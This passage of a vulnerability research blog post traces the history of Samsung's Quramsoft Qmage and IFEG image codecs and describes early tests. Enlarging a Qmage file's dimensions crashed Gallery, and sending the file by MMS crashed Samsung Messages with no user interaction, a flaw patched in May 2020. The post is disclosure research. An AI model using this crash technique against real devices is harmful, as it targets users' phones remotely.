The relevant file in the bundle is Platform.tar.gz/vendor/samsung/packages/apps/SBrowser/src/platform/kk/external/skia/src/images/SkImageDecoder_libqmage.cpp. I suspect that the "kk" subdirectory name relates to Android KitKat (version 4.4.4), whose release time frame coincides with the period when Qmage in Skia was first spotted in Samsung firmware (around June 2014). The code itself doesn't contain too much detail about the internals of the codec, as it delegates the actual parsing work to the QuramQmageDecParseHeader and QuramQmageDecodeFrame functions mentioned before. On the other hand, it gave me some psychological comfort and motivation to look for further clues and information – perhaps I wouldn't have to be limited to just ARM assembly and reverse-engineered structure layouts with made up field names, after all.More Qmage versions, parsers, and symbols – QMG boot animationsI will try to keep the section as brief as possible, even though it could easily fill a whole blog post on its own. The history of the Qmage format in Samsung devices is in fact much longer than the time span between 2014 and 2020 – before being incorporated in Skia, it had been used as the container format for boot and shutdown animations since early versions of Samsung Android, and theme resources in the pre-Android era. If you browse some mobile phone-related forums such as XDA Developers or, you will find a number of references to "Qmage" and "qmg" in those contexts. You can also check for yourself, by looking for .qmg files on the file system of a modern Samsung phone. On my Note 10+, I can find the following three:
  • /system/media/bootsamsungloop.qmg
  • /system/media/bootsamsung.qmg
  • /system/media/shutdown.qmg

Since these files represent animations and not static bitmaps, they are encoded differently than the Qmage samples we have seen so far. Let's have a look at their headers:
d2s:/ $ for file in /system/media/*.qmg; do xxd -g 1 -l 16 $file; done00000000: 51 4d 0f 00 80 00 a0 05 e0 0b 00 20 7b 50 00 00  QM......... {P..00000000: 51 4d 0f 00 80 00 a0 05 e0 0b 00 20 7b 50 00 00  QM......... {P..00000000: 51 4d 0f 00 80 00 a0 05 e0 0b 00 20 83 50 00 00  QM......... .P..d2s:/ $
They are stored in the old, familiar "QM" format, but with the version byte set to 0x0F instead of 0x01. Based on my research, I have concluded that QM animations have been assigned versions starting with 0x0B (11) up to 0x0F (15), which is currently the most recent one. The exact logic behind this versioning system is unknown; one unconfirmed hypothesis is that QM animation versions are expressed as X+10 where X is the corresponding static format version. Importantly, the animated images don't seem to be compatible with the static ones, so they cannot be easily used as input test cases for Skia.
The animations are displayed by the /system/bin/bootanimation system executable, which in turn uses a dedicated library (currently at around ~600 kB) for parsing the files. On a high level, the libQmageDecoder interfaces are similar to Skia's, but the inner workings start to differ deeper down the call stack. A general overview of the header parsing control flow is shown below:
QmageDecParseHeader└── QmageDecCommon_ParseHeader    ├── QmageDecCommon_QmageAudioVersionCheck    ├── QmageDecCommon_QGetDecoderInfo    ├── QmageDecCommon_VGetDecoderInfo    └── QmageDecCommon_WGetDecoderInfo
Within these functions, the following file signatures are being checked for: AUQM, NQ, QM, PFR, IM, IFEG, IT, QW. We have already seen most of them in Skia, but the first two on the list are completely new. This goes to show the depth of Quramsoft's portfolio in terms of the variety of invented file formats.
Furthermore, here is a simplified outline of the frame decoding process and the involved functions in the current on Android 10:
QmageDecodeAniFrame├── checkDecodeQueue│   └── QphotoThreadManager::checkDecodeQueue│       └── QphotoThreadPool::run│           └── QmageJob::run│               └── Qmage_WDecodeAniFrameThreadJob_Low│                   └── Qmage_WDecodeFrame_Low│                       └── _QM_WCodec_decode│                           └── PVcodecDecoderIndex│                           └── PVcodecDecoderGrayScale│                           └── PVcodecDecoder└── Qmage_VDecodeAniFrame_Low    ├── Qmage_VDecodeFrame_Low    │   └── _QM_DecodeOneFrame_A9LL_TINY    │   └── _QM_DecodeOneFrame_A9LL    │   └── _QM_DecodeOneFrame_A9LL_alpha    ├── _QM_DecodeOneFrame_A9LL_ani_LineSkip    ├── _QM_DecodeOneFrame_A9LL_ani    └── _QM_DecodeOneFrame_A9LL_ani_alpha
There are a number of previously unknown routines here under the Qmage_VDecode path, but there is also a very familiar subtree starting at Qmage_WDecodeFrame_Low, which we've already seen in Skia. But why is it even important, considering that boot animations are not really an attack surface? That's because the module in Samsung phones shipped with debug symbols for a long time – starting in mid-2010 with Android 2.1 (Eclair), up to various Samsung Android 4.3 firmwares published in 2013. During that time frame, the ELF file included not just function names, but also source file names and line numbers, full structure layouts, enum names, local variable names etc. It is a goldmine of useful information about the evolution of the codec during these years, and includes many details of the inner workings that still apply to this day.
For example, if we take from a Galaxy S Duos (Android 4.0.4, Jan 2013 build), we can use readelf and objdump to determine that:
  • The library compilation directory was /home2/cheus/Froyo/Froyo22_Qmage
  • It consisted of the following source files:
    • external/Qmage/QmageDecoderLIB/src/QmageDecCommon.c, 1547 lines of code
    • external/Qmage/QmageDecoderLIB/src/QmageDecoder.c, 219 LOC
    • external/Qmage/QmageDecoderLIB/src/Qmage_FDecoder_Low.c, 74 LOC
    • external/Qmage/QmageDecoderLIB/src/Qmage_VDecoder_Low.c, 3954 LOC
    • external/Qmage/QmageDecoderLIB/src/Qmage_WDecoder_Low.c, 5458 LOC
    • external/Qmage/QmageInterface/QmageInterface.c, 113 LOC
  • and the following headers:
    • external/Qmage/QmageDecoderLIB/src/QmageDecType.h
    • external/Qmage/QmageDecoderLIB/src/QmageDecCommon.h

We get access to some very helpful structures:
(gdb) ptype Qmage_DecderLowInfotype = struct {    QM_BOOL Ver200_SPEED;    QM_BOOL IS_ANIMATION;    QM_BOOL UseExtraException;    QM_BOOL tiny;    QM_BOOL IsDyanmicTable;    QM_BOOL IsOpaque;    QM_BOOL NearLossless;    QMINT32 SIZE_SHIFT;    QMINT32 ANI_RANGE;    QMINT32 qp;    QMINT32 mode_bit;    QMINT32 header_len;    QM_BOOL NotComp;    QM_BOOL NotAlphaComp;    QMINT32 alpha_decode_flag;    QMINT32 depth;    QMINT32 alpha_depth;    Qmage_VDecoderVMODE_T mode;    Qmage_V_DecoderVersion vversion;    Qmage_F_DecoderVersion fversion;    Qmage_DecoderVersion qversion;    QmageDecodeCodecType rgb_encoder_mode;    QmageDecodeCodecType alpha_encoder_mode;    QmageRawImageType out_type;}(gdb)
and equally interesting enums:
not to mention some very clean decompiler output:

It was only after finding this extended debug metadata that I started to understand how parts of the codec actually worked. I would highly recommend referring to these symbols if you are planning to perform any Qmage-related research; many of them may be even cleanly ported to a modern Skia disassembly database.
During a similar time frame around 2010, Samsung was also still producing non-Android mobile phones, which also have traces of Qmage in their underlying custom OS. Two examples of such devices are Samsung GT-B5722 (released in 2009) and Samsung GT-C5010 Squash (released in 2010):

Their firmware was again compiled with debug data built in, with many references to Qmage too. Let's take a look at the B5722 firmware – it contains a B5722_Master.x file which is a fairly regular ARM ELF executable, so we can load it in gdb-multiarch or IDA Pro and browse around or dump some types. As an example, we can find our favorite Qmage_WDecodeFrame_Low function, and explore its ascendants and descendants in the function control flow:
lkres_IFEGBodyDecode│├── QmageDecodeAniFrame│   └── Qmage_VDecodeAniFrame_Low│       ├── Qmage_VDecodeFrame_Low│       │   ├── _QM_DecodeOneFrame_A9LL_TINY│       │   ├── _QM_DecodeOneFrame_A9LL│       │   └── _QM_DecodeOneFrame_A9LL_alpha│       ├── _QM_DecodeOneFrame_A9LL_ani│       └── _QM_DecodeOneFrame_A9LL_ani_alpha├── QmageDecodeFrame│   ├── Qmage_VDecodeFrame_Low│   ├── Qmage_FDecodeFrame_Low│   └── Qmage_WDecodeFrame_Low│       └── _QM_WCodec_decode│           ├── _QM1st_decode│           └── _QM_WCodec_2nd_decode└── IFEGDecodeFrame    ├── IFEGDecodeFrame_DCT    ├── IFEGDecodeFrame_Pad    └── IFEGDecodeFrame_NoPad
In the above tree, we can recognize the "V" codec and the subtree responsible for processing animations, and the "W" codec handling static bitmaps, but there is also a whole new branch of code related to the decoding of IFEG. As you may remember from earlier in this post, this was one of the left-over magic values looked for by QmageDecCommon_VersionCheck_Rev8253_140615 in modern Skia – now we can see the format was actually used 10+ years ago. Additionally, all three of these code paths have a common ancestor in the lkres_IFEGBodyDecode function, which shows even more clearly that the IFEG and Qmage formats are closely related, with the former likely being some form of a predecessor of the latter. We can also verify that GT-B5722's embedded resources were encoded in both formats, by inspecting the B5722_Master.cfg file which enumerates the contents of the B5722_Master.tfs binary blob:
FILE_NAME : /a/images/13_pictbridge_pictbridge_top.ifgFILE_SIZE : 6908FILE_NAME : /a/images/13_pictbridge_pictbridge_top_hui.ifgFILE_SIZE : 4766FILE_NAME : /a/images/13_pictbridge_progress_bg.ifgFILE_SIZE : 1304FILE_NAME : /a/images/13_pictbridge_progress_bg_hui.ifgFILE_SIZE : 594FILE_NAME : /a/images/13_pictbridge_sending_ani01.ifg[...]FILE_NAME : /a/multimedia/imgapp/imgapp_default_image.qmgFILE_SIZE : 39128FILE_NAME : /a/multimedia/imgapp/imgapp_touch_toolbox_detail.qmgFILE_SIZE : 800FILE_NAME : /a/multimedia/imgapp/imgapp_touch_toolbox_detail_focus.qmgFILE_SIZE : 1152FILE_NAME : /a/multimedia/imgapp/imgapp_touch_toolbox_edit.qmgFILE_SIZE : 1340FILE_NAME : /a/multimedia/imgapp/imgapp_touch_toolbox_edit_focus.qmg
Based on this, we now know that Qmage files (in some shape) made their first appearance in Samsung devices around 2009-2010. But what about IFEG, and for how long has Samsung been shipping Quramsoft decoders? To answer that question, I delved into even older builds of the firmware and tried to bisect the debut of the custom codecs. The first ever phone that I have confirmed to use the IFEG format is Samsung SGH-D600, which launched in 2005. Almost all of its resources are encoded as .ifg files, and the software itself contains a number of relevant strings such as lk_ifegDecode, IFEGGetVersion, IFEGGetImageSize, IFEGDecodeFrame etc. This seems in line with Quramsoft's own declaration that their collaboration with Samsung started around June 2005. 
To make the story even more complex, the vendor was not even called "Quram" at the time; it was known under the name "I-master". Even though the switch to the current name took place in 2007, artifacts such as symbol names containing "Imaster" or "IM" could be found in Samsung's libraries for a few more years, e.g. Imaster_Malloc, ImasterVDecoder_ParseHeader, ImasterVDecErr_FAIL, IM_DecodeOneFrame_A9LL, etc. This could explain the meaning of the obsolete "IM" file signature mentioned earlier in this post, which I have seen used only once – as the container for boot animations on the very first Samsung phone running Android, Samsung GT-I7500 Galaxy released in 2009. What a ride! :)
To gather all this information in one place, I have compiled the following timeline showing the development of all Quramsoft image codecs I have observed shipping in Samsung devices over the years. While the presented data is based on my examination of dozens of firmwares, the Android ecosystem is a vastly complex one and involves thousands of software builds, so I make no promises as to the accuracy of the analysis below. If you spot any errors or inconsistencies that you can correct, please reach out and I will be happy to update this post.

As we can see, while Qmage has "only" been natively supported on Samsung Android since late 2014, the history of collaboration between Samsung and Quramsoft has lasted much longer. Reverse engineering these older binaries provided me with a lot of interesting insights, and pragmatically useful information such as the debug symbols from non-stripped executables. The extra context proved valuable later in the project and quite honestly, it also satisfied my curiosity, which is an important part. :)Initial pokes at the codecWith all this historic background behind us, it's time to see how the codec can be broken today, or rather could be broken before the May 2020 update. Let's go back to the original accessibility_light_easy_off.qmg sample we extracted before. We can open it in a hex editor again, and to start with a simple test, consider which parts are most likely to cause problems when corrupted. For bitmaps, the obvious candidates are the dimensions, so I modified the width and height just slightly (344 → 345) and tried to open it in Gallery on a system with the February 2020 patch level:

It wouldn't load anymore. It's worth noting that the Qmage codec is packed with __android_log_print calls, so we can grep for them with logcat to get some more information on what happened:
d2s:/ $ logcat -v tag | egrep "QG|Qmage"E/QG      : Qmage decoder error return value -298E/Qmage   : Qmage QuramQmageDecodeFrame offset <= 0, offset: -298
These log messages tend to be helpful from time to time, so it's worth keeping them in mind. With such a small change in the file, nothing bad seems to have happened, beyond a rightful error being thrown by the codec. What if we increase the dimensions even more, let's say from 0x158 (344) each to 0x558 (1368) each?

Let's try it:

The Gallery app instantly crashes. The full context can be extracted with logcat:
130|d2s:/ $ logcat -b crash -v rawFatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x700b9ffc90 in tid 12442 (thumbThread2), pid 12395 (droid.gallery3d)*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***Build fingerprint: 'samsung/d2sxx/d2s:10/QP1A.190711.020/N975FXXS2BTA7:user/release-keys'Revision: '24'ABI: 'arm64'pid: 12395, tid: 12442, name: thumbThread2  >>> <<<uid: 10125signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x700b9ffc90    x0  0000000000000000  x1  0000000000000558  x2  fffffffffffffaa8  x3  0000000000000011    x4  000000700ba00700  x5  0000000000000003  x6  0000000000000000  x7  0000000000000016    x8  0000000000000000  x9  00000000000003d2  x10 0000000000000004  x11 000000701bc85a16    x12 0000000000000000  x13 000000701bec0c0f  x14 000000700fc4e00d  x15 000000000000000d    x16 0000000000000018  x17 0000000000000000  x18 000000703a846000  x19 0000000000000305    x20 000000700b9ffc90  x21 000000700fb32a80  x22 000000700fb8f200  x23 0000000000088926    x24 000000005650868a  x25 000000701bec0c00  x26 00000000000003d2  x27 0000000000000007    x28 0000000000000020  x29 000000703ac3e5f0    sp  000000703ac3e390  lr  000000700ba00740  pc  0000007136b20d18
backtrace:      #00 pc 00000000002bbd18  /system/lib64/ (PVcodecDecoder_GrayScale_16bits_NEW+3636) (BuildId: fcab350692b134df9e8756643e9b06a0)      #01 pc 000000000029cefc  /system/lib64/ (__QM_WCodec_decode+948) (BuildId: fcab350692b134df9e8756643e9b06a0)      #02 pc 000000000029c9b0  /system/lib64/ (Qmage_WDecodeFrame_Low_Rev14474_20150224+320) (BuildId: fcab350692b134df9e8756643e9b06a0)      #03 pc 000000000029ae78  /system/lib64/ (QuramQmageDecodeFrame_Rev14474_20150224+164) (BuildId: fcab350692b134df9e8756643e9b06a0)      #04 pc 00000000006e1eec  /system/lib64/ (SkQmgCodec::onGetPixels(SkImageInfo const&, void*, unsigned long, SkCodec::Options const&, int*)+1100) (BuildId: fcab350692b134df9e8756643e9b06a0)[...]
The fact that such a trivial change to the file header was sufficient to trigger a crash did not bode well for the security of the codec. In my experience, no decently tested image parser would crash on such an obvious inconsistency. Then I remembered that the Samsung Messages app also displayed Qmage files, so I sent the malformed image via MMS to see what would happen. To my disbelief, the exact same crash reproduced again, this time in the process, and with no user interaction required:
Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x702ae96b10 in tid 15454 (pool-5-thread-1), pid 7904 (droid.messaging)[...]pid: 7904, tid: 15454, name: pool-5-thread-1  >>> <<<
This result had to mean that the Messages app automatically decoded images found in incoming messages, even before the user manually opened them. It was a big moment in my research, one which opened the seemingly fragile attack surface to remote exploitation by only knowing the victim's phone number. At that point, I was convinced that the best course of action was to run a thorough coverage-guided fuzzing session of the codec, and report all identified crashes to the vendor. This became my focus for the next couple of weeks, until documenting my findings and filing Issue #2002 in the PZ bug tracker at the end of January 2020. The fuzzing effort will be the subject of the next blog post in the Qmage series. Stay tuned!ConclusionIt is remarkable that such an attractive vulnerability research area managed to stay out of the public eye for so long. I expect that it was caused primarily by the closed-source nature of the code, and the fact that the implementation was buried so deep down in the image decoding stack, that it was just not expected to find custom OEM code of that extent there. I know I likely wouldn't have found it, if not for my lack of familiarity with Skia on Android, and the desire to learn where the execution of the BitmapFactory interface eventually ended up at (coupled with having a Samsung build of at hand). The fact that there are virtually no references or mentions of this technology online certainly didn't help.
In this write-up, I shared the results of the reconnaissance phase I went through shortly after discovering the codec. As is often the case in my line of work, this process involved spelunking in some pretty archaic areas of code for extended periods of time, to become somewhat of an expert in an obscure field that will never again prove useful outside of this project. :-) Still, I am hoping that it was an interesting read for those who, like me, enjoy some software archeology, and that it also makes a good reference guide to anyone who plans to continue working on Qmage security in the future.  
It is crucial that the security claims made by vendors are constantly challenged, and relevant attack surfaces are exposed and documented. When mistakes happen, it's at the expense of end user security and privacy and rarely the vendor themselves. This is why it's increasingly important for both vendors to follow best practices for security and software testing, and the vigilant security community to ensure that the same mistakes aren't made again. 
Kategorie: Hacking & Security